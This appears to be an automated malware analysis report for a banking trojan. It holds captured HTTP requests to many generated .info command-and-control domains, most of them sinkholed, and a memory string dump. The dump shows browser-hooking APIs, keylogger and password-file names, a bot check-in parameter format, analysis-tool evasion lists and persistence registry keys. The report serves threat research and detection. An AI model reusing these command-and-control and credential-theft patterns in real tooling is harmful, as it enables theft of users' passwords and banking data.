User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxafery.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:44 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halakuha.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:43 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halakuha.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:43 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxafery.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:44 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: lysugiro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: lyvamyda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:59 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sivydubu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:22 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gaqycyzu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:41 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: foxihazo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sikuvosy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gacehawy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:31 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: ryderule.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: jeperedi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:04 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:19 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:09 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kericura.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: qekenivo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gaqycyzu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:41 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: ryderule.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: masewyky.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:02 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gatofusi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:58 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: nofipymo.info


HTTP/1.1 200 OK
Date: Sun, 29 Oct 2017 17:10:22 GMT
Server: Apache
Set-Cookie: gvc=906vr2568426229522560; expires=Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=nofipymo.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:11 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: typihyqa.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:40 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mamawufo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:21 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: bonacamy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:59 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mamawufo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:21 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:11 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kefywiri.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:51 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: halybowu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobefizi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:09 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xutikexy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


The Trojan connects to the servers at the following location(s):

winlogon.exe_416_rwx_00B40000_000AA000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
